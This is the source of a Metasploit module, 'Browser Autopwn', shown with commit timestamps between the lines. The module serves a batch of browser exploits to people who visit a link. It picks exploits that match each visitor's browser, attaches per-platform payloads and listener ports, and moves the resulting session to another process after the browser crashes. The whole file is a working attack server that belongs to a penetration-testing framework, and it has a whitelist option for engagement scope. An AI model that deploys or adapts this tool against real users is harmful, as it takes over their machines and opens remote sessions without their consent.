2015-03-27 08:08:24 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
2015-07-02 20:29:24 +00:00
|
|
|
class Metasploit3 < Msf::Auxiliary
|
2015-03-27 08:08:24 +00:00
|
|
|
|
2015-04-14 06:33:02 +00:00
|
|
|
include Msf::Exploit::Remote::BrowserAutopwnv2
|
2015-03-27 08:08:24 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2015-05-25 22:24:41 +00:00
|
|
|
'Name' => "HTTP Client Automatic Exploiter (Browser Autopwn)",
|
2015-03-27 08:08:24 +00:00
|
|
|
'Description' => %q{
|
2015-05-25 22:24:41 +00:00
|
|
|
This module will automatically serve browser exploits. Here are the options you can
|
|
|
|
configure:
|
|
|
|
|
|
|
|
The Include option allows you to specify the kind of exploits to be loaded. For example,
|
|
|
|
if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.
|
|
|
|
|
|
|
|
The Exclude option will ignore exploits. For example, if you don't want any Adobe Flash
|
|
|
|
exploits, you can set this. Also note that the Exclude option will always be evaludated
|
|
|
|
after the Include option.
|
|
|
|
|
|
|
|
The MaxExploits option specifies the max number of exploits to load by Browser Autopwn.
|
|
|
|
By default, 20 will be loaded. But note that the client will probably not be vulnerable
|
|
|
|
to all 20 of them, so only some will actually be served to the client.
|
|
|
|
|
|
|
|
The Content option allows you to provide a basic webpage. This is what the user behind
|
|
|
|
the vulnerable browser will see. You can simply set a string, or you can do the file://
|
|
|
|
syntax to load an HTML file. Note this option might break exploits so try to keep it
|
|
|
|
as simple as possible.
|
|
|
|
|
|
|
|
The WhiteList option can be used to avoid visitors that are outside the scope of your
|
|
|
|
pentest engagement. IPs that are not on the list will not be attacked.
|
|
|
|
|
|
|
|
The MaxSessions option is used to limit how many sessions Browser Autopwn is allowed to
|
|
|
|
get. The default -1 means unlimited. Combining this with other options such as RealList
|
|
|
|
and Custom404, you can get information about which visitors (IPs) clicked on your malicious
|
|
|
|
link, what exploits they might be vulnerable to, redirect them to your own internal
|
|
|
|
training website without actually attacking them.
|
|
|
|
|
|
|
|
The RealList is an option that will list what exploits the client might be vulnerable to
|
|
|
|
based on basic browser information. If possible, you can run the exploits for validation.
|
|
|
|
|
|
|
|
For more information about Browser Autopwn, please see the reference link.
|
2015-03-27 08:08:24 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2015-04-14 18:30:34 +00:00
|
|
|
'Author' => [ 'sinn3r' ],
|
2015-06-29 17:13:46 +00:00
|
|
|
'DisclosureDate' => "Jul 5 2015",
|
2015-05-25 22:24:41 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'https://github.com/rapid7/metasploit-framework/wiki' ]
|
|
|
|
],
|
2015-07-02 20:29:24 +00:00
|
|
|
'Actions' =>
|
|
|
|
[
|
|
|
|
[ 'WebServer', {
|
|
|
|
'Description' => 'Start a bunch of modules and direct clients to appropriate exploits'
|
|
|
|
} ],
|
|
|
|
],
|
|
|
|
'PassiveActions' =>
|
|
|
|
[ 'WebServer' ],
|
|
|
|
'DefaultOptions' => {
|
|
|
|
# We know that most of these exploits will crash the browser, so
|
|
|
|
# set the default to run migrate right away if possible.
|
|
|
|
"InitialAutoRunScript" => "migrate -f",
|
|
|
|
},
|
|
|
|
'DefaultAction' => 'WebServer'))
|
2015-04-30 23:59:44 +00:00
|
|
|
|
2015-05-18 21:27:18 +00:00
|
|
|
|
2015-05-01 00:09:08 +00:00
|
|
|
register_advanced_options(get_advanced_options, self.class)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-07-05 23:21:45 +00:00
|
|
|
OptRegexp.new('INCLUDE_PATTERN', [false, 'Pattern search to include specific modules']),
|
|
|
|
OptRegexp.new('EXCLUDE_PATTERN', [false, 'Pattern search to exclude specific modules'])
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
register_advanced_options([
|
|
|
|
OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 20]),
|
|
|
|
OptString.new('HTMLContent', [false, 'HTML Content', '']),
|
|
|
|
OptAddressRange.new('AllowedAddresses', [false, "A range of IPs you're interested in attacking"]),
|
|
|
|
OptInt.new('MaxSessionCount', [false, 'Number of sessions to get', -1]),
|
|
|
|
OptBool.new('ShowExploitList', [true, "Show which exploits will actually be served to each client", false])
|
2015-05-01 00:09:08 +00:00
|
|
|
] ,self.class)
|
2015-04-30 23:59:44 +00:00
|
|
|
end
|
|
|
|
|
2015-05-01 00:09:08 +00:00
|
|
|
def get_advanced_options
|
2015-04-30 23:59:44 +00:00
|
|
|
opts = []
|
|
|
|
DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
|
2015-05-29 18:43:20 +00:00
|
|
|
opts << OptString.new("PAYLOAD_#{platform.to_s.upcase}", [true, "Payload for #{platform} browser exploits", payload_info[:payload] ])
|
|
|
|
opts << OptInt.new("PAYLOAD_#{platform.to_s.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info[:lport]])
|
2015-04-30 23:59:44 +00:00
|
|
|
end
|
2015-05-01 00:09:08 +00:00
|
|
|
|
2015-04-30 23:59:44 +00:00
|
|
|
opts
|
2015-03-27 08:08:24 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_exploit(cli, request, target_info)
|
2015-05-15 00:09:38 +00:00
|
|
|
serve = build_html(cli, request)
|
2015-05-10 21:50:32 +00:00
|
|
|
send_exploit_html(cli, serve)
|
2015-03-27 08:08:24 +00:00
|
|
|
end
|
|
|
|
|
2015-07-02 20:29:24 +00:00
|
|
|
def run
|
|
|
|
exploit
|
|
|
|
end
|
2015-03-27 08:08:24 +00:00
|
|
|
|
|
|
|
end
|